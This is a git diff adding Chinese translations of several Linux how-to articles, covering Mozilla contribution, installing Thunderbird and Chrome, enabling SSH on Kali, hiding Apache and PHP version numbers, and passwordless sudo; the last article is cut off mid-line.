+![screenshot-from-2017-01-18-15-21-47](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/Screenshot-from-2017-01-18-15-21-47.jpg) + +### 相关软件 + +#### F.lux + +Redshift 可以被看作是 F.lux 的开源变体。现在有一个 [linux 版本的 F.lux][6]。如果你不介意使用闭源软件,或者 Redshift 不能正常工作,你可以考虑使用它。 + +#### Android 版 Twilight + +Twilight 与 Redshift 相似,但是用于 Android。它可以让你在晚上在智能手机或平板上阅读更加舒服。 + +#### Redshift plasmoid + +这是 Redshift GUI 的 KDE 版本。你可以在 [github ][7] 中找到更多信息。 + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/safe-eyes-redshift/ + +作者:[novel][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://novel.id.fedoraproject.org/ +[1]:https://fedoramagazine.org/safe-eyes-redshift/ +[2]:http://www.latlong.net/ +[3]:http://jonls.dk/redshift/ +[4]:https://copr.fedorainfracloud.org/coprs/mystro256/gnome-redshift/ +[5]:https://github.com/benzea/gnome-shell-extension-redshift +[6]:https://justgetflux.com/linux.html +[7]:https://github.com/simgunz/redshift-plasmoid diff --git a/published/20170119 How to get started contributing to Mozilla.md b/published/20170119 How to get started contributing to Mozilla.md new file mode 100644 index 0000000000..8e33e34702 --- /dev/null +++ b/published/20170119 How to get started contributing to Mozilla.md @@ -0,0 +1,129 @@ +如何向 Mozilla 开源社区做贡献 +============================================================ + +![How to get started contributing to Mozilla](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/rh_003588_01_rd3os.combacktoschoolserieshe_rh_041x_0.png?itok=yUgHEdMK "How to get started contributing to Mozilla") + +opensource.com 供图 + +_千里之行,始于足下(The journey of a thousand miles begins with one step) —— 老子_ + +参与开源工作有很多好处,可以帮助你优化和加速技术生涯,包括但不仅限于提高现实中的技术经验和拓展你的专业人脉。有很多你能做贡献的开源项目,无论是小型、中型、大型,还是不知名或知名的项目。在这篇文章里我们将专注于如何为网上最大最有名的开源项目之一 ,**Mozilla** ,做出贡献。 + +### 为什么要向 Mozilla 做贡献? + +#### 现实经验 + +Mozilla 是网络上最大的开源项目之一,其也托管了许多其他的开源项目。所以,当你为像 Mozilla 这样的大型开源项目做贡献时,你能真正接触到技术领域中的事物是如何工作的,能增长关于技术术语和复杂系统功能的知识。最重要的是,你能理解如何将代码从本地系统移动到实际的代码仓库里。你将会学习在管理大型项目时,贡献者们使用的许多工具和技术,如 Github 、Docker、Bugzilla 等。 + +#### 社区联系 + +社区是任何开源项目的核心。向 Mozilla 做贡献将你与 Mozilla 的员工和顾问、资深 Mozilla 贡献者(又称 Mozillians)以及你当地的 Mozilla 社区相互联系在一起。社区里有着同样关注并致力于改善开源项目的志趣相投的人们。 + +你也能有个机会来建立在 Mozilla 社区里的专属身份,激励其他 Mozillians 同伴。如果你想的话,最后你也能指导其他人。 + +#### 活动和酷物件 + +没有点充满乐趣的活动和小礼品的社区是不完整的。Mozilla 也不例外。 + +向 Mozilla 做贡献能给你机会参加 Mozilla 的内部活动。一旦你成为熟练的 Mozilla 贡献者,你将能主持你当地的 Mozilla 活动(Mozilla 或许会予以资金支持)。当然,会另外提供些小礼品 —— 贴纸,T恤,马克杯等。 + +![印度 2016 Mozilla 聚会](https://opensource.com/sites/default/files/mozilla-india-meetup-2016.jpg "India Mozilla meetup 2016") + +*根据 CC BY-SA 4.0 协议分享,印度 2016 Mozilla 聚会, Moin Shaikh 提供。* + +### 如何向 Mozilla 做贡献 + +不管您是编程人员、网页设计师、品质控制测试者、翻译,或者是介于之间的任何职业,都有许多不同的方式向 Mozilla 做贡献。让我们看看以下两个主要方面:技术贡献和非技术贡献。 + +![贡献的方式](https://opensource.com/sites/default/files/ways-to-contribute-mozilla_0.jpg "Ways to contribute") + +*根据 CC BY-SA 3.0 协议分享,  [Mozilla.org][1] 供图。* + +#### 技术贡献 + +技术贡献是给那些喜欢编程,想要用他们的代码来弄出点动静的人。有不同的用特定编程语言的项目可供施展能力。 + +* 如果喜欢 C++ ,你能向火狐的核心层和其他 Mozilla 产品做贡献。 +* 如果喜欢 JavaScript、HTML 和 CSS ,你能向火狐的前端做贡献。 +* 如果你懂得 Java ,你能向火狐移动端、火狐安卓版和 MozStumbler (LCTT 译注:MozStumbler 是 Mozilla 开源无线网络扫描程序)做贡献。 +* 如果你懂得 Python ,你能给网络服务,包括火狐同步(Firefox Sync)或者火狐账户(Firefox Accounts)做贡献。 +* 如果你懂得 Shell、Make、Perl 或者 Python ,你能给 Mozilla 的编译系统和发布引擎和自动化做贡献。 +* 如果你懂得 C 语言,你能给 NSS、Opus 和 Daala 做贡献。 +* 如果你懂得 Rust 语言,你能给 RustC、Servo(一个为并行、安全而设计的网页浏览器引擎)或者 Quantum (一个将大量 Servo 转化为 Gecko 的项目)做贡献。 +* 如果你懂得 Go 语言,你能给 Heka 做贡献,这是一个数据处理工具。 + +要获取更多信息,可以访问 Mozilla 开发者网络Mozilla Developer Network(MDN)的[开始][3]部分来了解不同的贡献领域。 + +除了语言和代码,积极测试火狐浏览器的各个部分、火狐安卓浏览器和 Mozilla 的很多网络组件,例如火狐附加组件等,这样也能贡献你的品质保证(QA)和测试能力。 + +#### 非技术贡献 + +你也可以给 Mozilla 提供非技术贡献,专注于以下领域:品质保证(QA)测试,文档翻译,用户体验/用户界面(UX/UI)设计,Web 识别(web literacy),开源宣讲(open source advocacy),给 Mozilla 的火狐用户、雷鸟用户提供支持等。 + +**品质保证(QA)测试:** Mozilla 的 QA 团队遍及全世界,有着庞大且活跃的社区,他们深入参与到了火狐及 Mozilla 的其他项目中。QA 贡献者早期介入到各种产品,探索新的特性,记录漏洞,将已知漏洞分类,编写并执行测试用例,进行自动化测试,并从可用性角度提供有价值的反馈。想开始或者了解更多 Mozilla QA 社区资源,请访问 [Mozilla QA 社区][4] 网页。 + +**用户体验设计:** 如果你是个有创意的设计者或是个喜爱折腾色彩和图形的极客,Mozilla 在其社区里有很多位置提供给你,在那里你能设计好用易理解的、美妙的 Mozilla 项目。去看看 Mozilla GitHub page 上的[开放设计仓库Open Design repository][5] 页面。 + +**用户支持(论坛和社交支持):** 这是成千上万像你我这样的火狐、雷鸟用户访问和发帖询问关于火狐、雷鸟问题的地方。这也是他们从像我们这样的 Mozilla 贡献者获取回答的地方。这不需要编程才华,不需要设计技能,不需要测试能力,作为火狐用户支持贡献者,你只需要有点儿火狐的知识即可上手。点击 [SUMO][7] 的“[参与其中][6]”的链接来加入用户支持。从做支持开始或许是你着手开始你的 Mozilla 旅程中最简单的部分。(注:三年前,我从社区支持论坛开始我的 Mozilla 旅程) + +**编写知识库和帮助文章:** 如果你喜欢写作和传授知识,知识库对你来说是个好地方。 Mozilla 总是在寻找能给火狐和其它产品用英文撰写、编辑、校对文章的志愿者。每周有成千上万的用户浏览这些知识库文章,通过分享你的智慧和编写帮助文章,你也能产生强大的影响力。访问 [Mozilla 知识库][8] 页面来参与其中。 + +**本地化,又称 “L10N”:** (LCTT 译注:L10N 是 localization 的缩写形式,意即在 l 和 n 之间有 10 个字母) Mozilla 的产品,例如火狐,被全世界数百万讲着不同语言的人们所使用着。人们需要这些产品以他们的语言显示。语言本地化是个非常需要志愿者的领域。需要你的翻译和本地化能力的项目包括: + +* Mozilla 产品,例如火狐 +* Mozilla 网页和服务 +* Mozilla 市场活动 +* SUMO 产品支持文档 +* MDN 开发者文档 + +你可以访问 [Mozilla 本地化][9]页面来参与其中。 + +**教授和 Web 识别(web literacy)能力:** Mozilla 基本使命目标之一是使所有人都可访问网络。为了实现这个目标使命,Mozilla 通过提供 web 识别工具和技术来致力于教育和帮助 Web 用户。这是可以用你的教授技能来帮助他人的地方。如果你是一位喜欢分享知识、给民众展示关于互联网相关东西的热情的老师,来看一下 Mozilla 发起的 [Web 教育][10]活动。将互联网和 web 识别教给你当地社区、学校孩子、你的朋友和其他有关的人。 + +**宣讲:** 如果你对 Mozilla 的使命充满热情,你能通过倡导 Mozilla 的使命来传播使命内容。当倡导 Mozilla 的使命时,你能做出如下来贡献: + +* 捍卫公共规则,为开放的互联网和用户隐私做斗争。 +* 跟网站管理者在兼容性方面合作,提高网站的互操作性。 +* 帮助网络作者提升在开放网络方面的文章写作。 +* 成为[火狐朋友(Firefox Friends)][2],展示你作为 Mozilla 和火狐贡献者的自豪。 + +想要开始帮助宣传 Mozilla 使命,看一下 [Mozilla 宣讲][11] 页面。 + +### 如果你还有疑惑,我来帮你开始! + +我知道,作为一个新来的贡献者,这篇文章或许给你太多的信息。如果你需要更深入的方向、更多的资源资料,你可以在下面的评论中问我,或者[在 Twitter 里私信我][12],我很乐意帮助你开始向 Mozilla 做出第一次的贡献(或者更多!) + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/15492097_10205888026638370_7707367819712084708_n.jpg?itok=3R90PGkv) + +Moin Shaikh 是一个开源科技极客,职业是网页分析,有着 7 年多的 IT 工作经验。主要贡献领域:火狐网络 QA ,火狐技术支持,本地化和社区指导。除了开源贡献,还学习并身体力行于用户体验、物料设计和电子商务分析。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/how-get-started-contributing-mozilla + +作者:[Moin Shaikh][a] +译者:[ypingcn](https://github.com/ypingcn) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: https://opensource.com/users/moinshaikh +[1]: http://mozilla.org/ +[2]: https://www.mozilla.org/en-US/contribute/friends/ +[3]: https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Introduction#Find_a_bug_we've_identified_as_a_good_fit_for_new_contributors. +[4]: https://quality.mozilla.org/get-involved/ +[5]: https://github.com/mozilla/OpenDesign +[6]: https://support.mozilla.org/en-US/get-involved/questions +[7]: http://support.mozilla.org/ +[8]: https://support.mozilla.org/en-US/get-involved/kb +[9]: https://l10n.mozilla.org/ +[10]: https://learning.mozilla.org/en-US/ +[11]: https://advocacy.mozilla.org/en-US +[12]: https://twitter.com/moingshaikh + + + diff --git a/published/20170120 Install Latest Thunderbird Email Client in Linux Systems.md b/published/20170120 Install Latest Thunderbird Email Client in Linux Systems.md new file mode 100644 index 0000000000..9de5115634 --- /dev/null +++ b/published/20170120 Install Latest Thunderbird Email Client in Linux Systems.md @@ -0,0 +1,86 @@ +在 Linux 中安装最新的 Thunderbird 邮件客户端 +============================================================ + +雷鸟(Thunderbird) 是一个开源自由的跨平台的基于 web 的电子邮件、新闻和聊天客户端应用程序,其旨在处理多个电子邮件帐户和新闻源。 + +在 2016 年 12 月 28 日,Mozilla 团队宣布 Thunderbird 45.6.0 的发布。这个新版本带有如下功能: + +### Thunderbird 45.6.0 功能 + +1. 每次启动 Thunderbird 时都会显示系统集成对话框 +2. 各种错误修复和性能改进。 +3. 各种安全修复。 + +查看更多关于 Thunderbird 45.6.0 版本的新功能和已知问题在 [Thunderbird 发行说明][1]中有。 + +本文将解释如何在 Linux 发行版(如 Fedora、Ubuntu 及其衍生版)中安装 Thunderbird 邮件客户端。 + +在许多 Linux 发行版中,Thunderbird 包已经默认包含在内,并且可以使用默认包管理系统来安装,这样可以: + +1. 确保你具有所有需要的库 +2. 添加桌面快捷方式以启动 Thunderbird +3. 使 Thunderbird 可供计算机上的所有系统用户访问 +4. 它可能不会为你提供最新版本的 Thunderbird + +### 在 Linux 中安装 Thunderbird 邮件客户端 + +要从系统默认仓库中安装 Thunderbird: + +``` +$ sudo apt-get install thunderbird [在基于 Ubuntu 的系统中] +$ dnf install thunderbird [在基于 Fedora 的系统中] +``` + +如我所说,从默认仓库中安装的话将带给你的是旧版本 Thunderbird。如果要安装最新版本的 Mozilla Thunderbird,可以使用 Mozilla 团队维护的 PPA。 + +在 Ubuntu 及其衍生版中使用 `CTRL + ALT + T` 从桌面打开终端并添加 Thunderbird 仓库。 + +``` +$ sudo add-apt-repository ppa:ubuntu-mozilla-security/ppa +``` + +接下来,使用 `update` 命令升级软件包。 + +``` +$ sudo apt-get update +``` + +系统升级完成后,使用下面的命令安装。 + +``` +$ sudo apt-get install thunderbird +``` + +### Thunderbird 预览 + +[ + ![Install Thunderbird in Linux](http://www.tecmint.com/wp-content/uploads/2012/11/Install-Thunderbird-in-Linux.png) +][2] + +*在 Linux 中安装 Thunderbird* + +就是这样了,你已经成功在 Linux 中安装了 Thunderbird 45.6.0。在 [Thunderbird 下载页][3]中 Thunderbird 还可用于其他操作系统。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](http://1.gravatar.com/avatar/7badddbc53297b2e8ed7011cf45df0c0?s=256&d=blank&r=g) + +我是 Ravi Saive,TecMint 的创建者。一个喜欢在互联网上分享技巧和提示的计算机 Geek 和 Linux 大师。我的大多数服务器运行在 Linux 开源平台上。在 Twitter、Facebook 和 Google+ 上关注我。 + +-------------------------------------------------------------------------------- + + +via: http://www.tecmint.com/install-thunderbird-in-ubuntu-fedora-linux/ + +作者:[Ravi Saive][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[1]:https://www.mozilla.org/en-US/thunderbird/45.6.0/releasenotes/ +[2]:http://www.tecmint.com/wp-content/uploads/2012/11/Install-Thunderbird-in-Linux.png +[3]:http://www.mozilla.org/en-US/products/thunderbird/ diff --git a/published/20170121 How to install Google Chrome Browser on Kali Linux.md b/published/20170121 How to install Google Chrome Browser on Kali Linux.md new file mode 100644 index 0000000000..eca762a2f2 --- /dev/null +++ b/published/20170121 How to install Google Chrome Browser on Kali Linux.md @@ -0,0 +1,99 @@ +如何在 Kali Linux 中安装 Google Chrome 浏览器 +==================== + +### 介绍 + +**目的** + +我们的目标就是在 Kali Linux 上安装好 Google Chrome Web 浏览器。同时,请参阅附录为可能出现的问题进行排查。 + +**要求** + +需要获得已安装 Kali Linux 或者 Live 系统的特权。 + +**困难程度** + +容易。 + +**惯例** + +- `#` - 给定命令需要以 root 用户权限运行或者使用 `sudo` 命令 +- `$` - 给定命令以常规权限用户运行 + +### 步骤说明 + +**下载 Google Chrome** + +首先,使用 `wget` 命令来下载最新版本的 Google Chrome 的 debian 安装包。 + +``` +# wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb +``` + +**安装 Google Chrome** + +在 Kali Linux 安装 Google Chrome 最容易的方法就是使用 `gdebi`,它会自动帮你下载所有的依赖包。 + +``` +# gdebi google-chrome-stable_current_amd64.deb +``` + +**启动 Google Chrome** + +开启一个终端(terminal),执行 `google-chrome` 命令来启动 Google Chrome 浏览器。 + +``` +$ google-chrome +``` + +### 附录 + +**非法指令 (Illegal Instruction)** + +当以 root 用户特权来运行 `google-chrome` 命令是,会出现 非法指令 (Illegal Instruction) 错误信息。因为通常情况下,Kali Linux 默认情况下的默认用户是 root 用户,我们需要创建一个虚的非特权用户,比如 `linuxconfig`,然后使用这个用户来启动 Google Chrome 浏览器。如下: + +``` +# useradd -m -d /home/linuxconfig linuxconfig +# su linuxconfig -c google-chrome +``` + +**libappindicator1 包未安装** + +``` +dpkg: dependency problems prevent configuration of google-chrome-stable: + google-chrome-stable depends on libappindicator1; however: + Package libappindicator1 is not installed. +``` + +使用 `gdebi` 命令来安装 Google Chrome 的 debian 包可以解决依赖问题。参阅上文。  + + ![在 Kali Linux 中以普通用户启动 google chrome](https://linuxconfig.org/images/kali-linux-google-chome-browser-start.jpg) + +------------------------------- + +译者简介: + +[GHLandy](http://GHLandy.com) —— 生活中所有欢乐与苦闷都应藏在心中,有些事儿注定无人知晓,自己也无从说起。 + +------------------------------- + +via: https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux + +作者:[Lubos Rendek][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux +[1]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-4-1-illegal-instruction +[2]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-4-2-package-libappindicator1-is-not-installed +[3]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-1-download-google-chrome +[4]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-2-install-google-chrome +[5]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-3-start-google-chrome +[6]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-4-appendix +[7]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h1-objective +[8]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h2-requirements +[9]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h3-difficulty +[10]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h4-conventions +[11]:https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux#h5-instructions diff --git a/published/20170121 How to install SSH secure shell service on Kali Linux.md b/published/20170121 How to install SSH secure shell service on Kali Linux.md new file mode 100644 index 0000000000..9f6e196782 --- /dev/null +++ b/published/20170121 How to install SSH secure shell service on Kali Linux.md @@ -0,0 +1,97 @@ +如何在 Kali Linux 上安装 SSH 服务 +=============== + +### 介绍 + +**目的** + +我们的目的是 Kali Linux 上安装 SSH(安全 shell)。 + +**要求** + +你需要有特权访问你的 Kali Linux 安装或者 Live 系统。 + +**困难程度** + +很容易! + +**惯例** + +- `#` - 给定命令需要以 root 用户权限运行或者使用 `sudo` 命令 +- `$` - 给定命令以常规权限用户运行 + +### 指导 + +**安装 SSH** + +从终端使用 `apt-get` 命令安装 SSH 包: + +``` +# apt-get update +# apt-get install ssh +``` + +**启用和开始使用 SSH** + +为了确保安全 shell 能够使用,在重启系统后使用 `systemctl` 命令来启用它: + +``` +# systemctl enable ssh +``` + +在当前对话执行中使用 SSH: + +``` +# service ssh start +``` + +**允许 SSH Root 访问** + +默认情况下 SSH 不允许以 root 用户登录,因此将会出现下面的错误提示信息: + +``` +Permission denied, please try again. +``` + +为了通过 SSH 进入你的 Kali Linux 系统,你可以有两个不同的选择。第一个选择是创建一个新的非特权用户然后使用它的身份来登录。第二个选择,你可以以 root 用户访问 SSH 。为了实现这件事,需要在SSH 配置文件 `/etc/ssh/sshd_config` 中插入下面这些行内容或对其进行编辑: + +将 + +``` +#PermitRootLogin prohibit-password +``` + +改为: + +``` +PermitRootLogin yes +``` + +![kali linux enable ssh root access](https://linuxconfig.org/images/enable-root-ssh-login-kali-linux.jpg) + +对 `/etc/ssh/sshd_config` 进行更改以后,需在以 root 用户登录 SSH 前重启 SSH 服务: + +``` +# service ssh restart +``` + + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux + +作者:[Lubos Rendek][a] +译者:[ucasFL](https://github.com/ucasFL) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux +[1]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h5-1-install-ssh +[2]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h5-2-enable-and-start-ssh +[3]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h5-3-allow-ssh-root-access +[4]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h1-objective +[5]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h2-requirements +[6]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h3-difficulty +[7]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h4-conventions +[8]:https://linuxconfig.org/how-to-install-ssh-secure-shell-service-on-kali-linux#h5-instructions diff --git a/published/20170123 How to Hide Apache Version Number and Other Sensitive Info.md b/published/20170123 How to Hide Apache Version Number and Other Sensitive Info.md new file mode 100644 index 0000000000..135fb3f856 --- /dev/null +++ b/published/20170123 How to Hide Apache Version Number and Other Sensitive Info.md @@ -0,0 +1,104 @@ +如何隐藏 Apache 版本号和其它敏感信息 +============================================================ + +当远程请求发送到你的 Apache Web 服务器时,在默认情况下,一些有价值的信息,如 web 服务器版本号、服务器操作系统详细信息、已安装的 Apache 模块等等,会随服务器生成的文档发回客户端。 + +这给攻击者利用漏洞并获取对 web 服务器的访问提供了很多有用的信息。为了避免显示 web 服务器信息,我们将在本文中演示如何使用特定的 Apache 指令隐藏 Apache Web 服务器的信息。 + +**推荐阅读:** [13 个有用的 Apache 服务器安全贴士][1]。 + +两个重要的指令是: + +### ServerSignature + +这允许在服务器生成的文档(如错误消息、mod_proxy 的 ftp 目录列表、mod_info 输出等等)下添加一个显示服务器名称和版本号的页脚行。 + +它有三个可能的值: + +- `On` - 允许在服务器生成的文档中添加尾部页脚行, +- `Off` - 禁用页脚行 +- `EMail` - 创建一个 “**mailto:**” 引用;用于将邮件发送到所引用文档的 ServerAdmin。 + +### ServerTokens + +它决定了发送回客户端的服务器响应头字段是否包含服务器操作系统类型的描述和有关已启用的 Apache 模块的信息。 + +此指令具有以下可能的值(以及在设置特定值时发送到客户端的示例信息): + +``` +ServerTokens Full (或者不指定) +``` +发送给客户端的信息: `Server: Apache/2.4.2 (Unix) PHP/4.2.2 MyMod/1.2` +``` +ServerTokens Prod[uctOnly] +``` +发送给客户端的信息: `Server: Apache` +``` +ServerTokens Major +``` +发送给客户端的信息: `Server: Apache/2` +``` +ServerTokens Minor +``` +发送给客户端的信息: `Server: Apache/2.4` +``` +ServerTokens Min[imal] +``` +发送给客户端的信息:`Server: Apache/2.4.2` +``` +ServerTokens OS +``` +发送给客户端的信息: `Server: Apache/2.4.2 (Unix)` + + +**注意**:在 Apache **2.0.44** 之后,`ServerTokens` 也控制由 `ServerSignature` 指令提供的信息。 + +**推荐阅读:** [5 个加速 Apache Web 服务器的贴士][2]。 + +为了隐藏 web 服务器版本号、服务器操作系统细节、已安装的 Apache 模块等等,使用你最喜欢的编辑器打开 Apache 配置文件: + +``` +$ sudo vi /etc/apache2/apache2.conf #Debian/Ubuntu systems +$ sudo vi /etc/httpd/conf/httpd.conf #RHEL/CentOS systems +``` + +添加/修改/附加下面的行: + +``` +ServerTokens Prod +ServerSignature Off +``` + +保存并退出文件,重启你的 Apache 服务器: + +``` +$ sudo systemctl apache2 restart #SystemD +$ sudo sevice apache2 restart #SysVInit +``` + +本篇中,我们解释了如何使用特定的 Apache 指令隐藏Apache web 服务器版本号及其他信息。 + +如果你在 Apache 中运行 PHP,我建议你[隐藏 PHP 版本号][3]。 + +如往常一样,你可以在评论栏中写下你的想法。 + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 及 web 开发者,目前是 TecMint 的内容创作者,他喜欢用电脑工作,并坚信分享知识。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/hide-apache-web-server-version-information/ + +作者:[Aaron Kili][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ +[1]:http://www.tecmint.com/apache-security-tips/ +[2]:http://www.tecmint.com/apache-performance-tuning/ +[3]:http://www.tecmint.com/hide-php-version-http-header/ diff --git a/published/20170124 How to Hide PHP Version Number in HTTP Header.md b/published/20170124 How to Hide PHP Version Number in HTTP Header.md new file mode 100644 index 0000000000..b13d878f69 --- /dev/null +++ b/published/20170124 How to Hide PHP Version Number in HTTP Header.md @@ -0,0 +1,99 @@ +如何在 HTTP 头中隐藏 PHP 版本号 +============================================================ + +PHP 配置默认允许服务器在 HTTP 响应头 `X-Powered-By` 中显示安装在服务器上的 PHP 版本。 + +出于服务器安全原因(虽然不是主要的要担心的威胁),建议你禁用或隐藏此信息,避免那些针对你的服务器的攻击者知道你是否运行了 PHP。 + +假设你服务器上安装的特定版本的 PHP 具有安全漏洞,另一方面,攻击者可以了解这一点,他们将更容易利用漏洞并通过脚本访问服务器。 + +在我以前的文章中,我已经展示了[如何隐藏 apache 版本号][1],你已经看到如何不再显示 apache 的安装版本。但是如果你在你的 apache 服务器上运行 PHP,你还需要隐藏 PHP 的安装版本,这我们将在本文中展示。 + +因此,在本文中,我们将解释如何隐藏或关闭服务器 HTTP 响应头中的 PHP 版本号。 + +此设置可以在加载的 PHP 配置文件中配置。如果你不知道此配置文件在服务器上的位置,请运行以下命令找到它: + +``` +$ php -i | grep "Loaded Configuration File" +``` +PHP 配置文件位置 +``` +---------------- 在 CentOS/RHEL/Fedora 上---------------- +Loaded Configuration File => /etc/php.ini +---------------- 在 Debian/Ubuntu/Linux Mint 上---------------- +Loaded Configuration File => /etc/php/7.0/cli/php.ini +``` + +在对 PHP 配置文件进行任何更改之前,我建议您首先备份您的 PHP 配置文件,如下所示: + +``` +----------------在 CentOS/RHEL/Fedora 上---------------- +$ sudo cp /etc/php.ini /etc/php.ini.orig +---------------- 在 Debian/Ubuntu/Linux Mint 上---------------- +$ sudo cp /etc/php/7.0/cli/php.ini /etc/php/7.0/cli/php.ini.orig +``` + +[用你最喜欢的编辑器][2],使用超级用户权限打开文件: + +``` +---------------- 在 CentOS/RHEL/Fedora 上---------------- +$ sudo vi /etc/php.ini +----------------在 Debian/Ubuntu/Linux Mint 上---------------- +$ sudo vi /etc/php/7.0/cli/php.ini +``` + +定位到关键词 `expose_php`,并将值设置成 `Off`: + +``` +expose_php = Off +``` + +保存并退出文件。之后,重启 web 服务器: + +``` +---------------- 使用 SystemD ---------------- +$ sudo systemctl restart httpd +$ sudo systemctl restart apache2 +---------------- 使用 SysVInit ---------------- +$ sudo service httpd restart +$ sudo service apache2 restart +``` + +最后,不过同样重要,使用下面的命令检查服务器 HTTP 响应头是否仍然显示你的 PHP 版本号。 + +``` +$ lynx -head -mime_header http://localhost +或者 +$ lynx -head -mime_header http://server-address +``` + +这里的标志含义是: + +- `-head` – 发送一个请求 mime 报头的 HEAD 请求。 +- `-mime_header` – 打印所提取文档的 MIME 标头及其源代码。 + +**注意**: 确保你系统中已经安装了[命令行 web 浏览器 lynx][3]。 + +就是这样了!在本文中,我们解释了如何隐藏服务器 HTTP 响应头中的 PHP 版本号以保护 web 服务器免受可能的攻击。你可以在下面的评论栏中留下你的想法或者相关的问题。 + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 及 web 开发者,目前是 TecMint 的内容创作者,他喜欢用电脑工作,并坚信分享知识。 + +--------------------------------------------------------------------------------- + + +via: http://www.tecmint.com/hide-php-version-http-header/ + +作者:[Aaron Kili][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ +[1]:http://www.tecmint.com/hide-apache-web-server-version-information/ +[2]:http://www.tecmint.com/linux-command-line-editors/ +[3]:http://www.tecmint.com/command-line-web-browsers/ diff --git a/published/20170125 How to Run sudo Command Without Entering a Password in Linux.md b/published/20170125 How to Run sudo Command Without Entering a Password in Linux.md new file mode 100644 index 0000000000..e43698c8d4 --- /dev/null +++ b/published/20170125 How to Run sudo Command Without Entering a Password in Linux.md @@ -0,0 +1,92 @@ +如何在 Linux 中不输入密码运行 sudo 命令 +============================================================ + +假设你在只有自己使用的计算机上运行 Linux 系统,比如在笔记本电脑上,在每次调用 **sudo** 时需要输入密码,长期下来就会觉得很乏味。因此,在本指南中,我们将描述[如何配置 sudo 命令][4]在运行时而不输入密码。 + +此设置在 `/etc/sudoers` 文件中完成,这是使用 [sudo 命令][5]的默认安全策略;在用户权限指定部分。 + +**重要**:在 `sudeors` 文件中,默认打开的 `authenticate` 参数用于验证目的。如果设置了它,用户必须通过密码(或其他身份验证方法)进行身份验证,然后才能使用 `sudo` 运行命令。 + +但是,可以使用 `NOPASSWD`(当用户调用 `sudo` 命令时不需要密码)标记来覆盖此默认值。 + +配置用户权限的语法如下: + +``` +user_list host_list=effective_user_list tag_list command_list +``` + +其中: + +1. `user_list` - 用户列表或已经设置的用户别名。 +2. `host_list` - 主机列表或用户可以在其上运行 sudo 的主机别名。 +3. `effective_user_list` - 以该用户或别名运行的用户列表 +4. `tag_list` - 标签列表,如 `NOPASSWD`。 +5. `command_list` - 用户使用 `sudo` 运行的命令或命令别名列表。 + +要允许用户(下面的示例中的 `aaronkilik`)使用 `sudo` 不输入密码即可运行所有命令,请打开 `sudoers` 文件: + +``` +$ sudo visudo +``` + +添加下面的行: + +``` +aaronkilik ALL=(ALL) NOPASSWD: ALL +``` + +对于组而言,在组名前面使用 `%` 字符;这意味着 `sys` 组的所有成员都可以不用密码使用 `sudo`。 + +``` +%sys ALL=(ALL) NOPASSWD: ALL +``` + +要允许用户不用密码使用 `sudo` 运行指定命令(`/bin/kill`),添加下面的行: + +``` +aaronkilik ALL=(ALL) 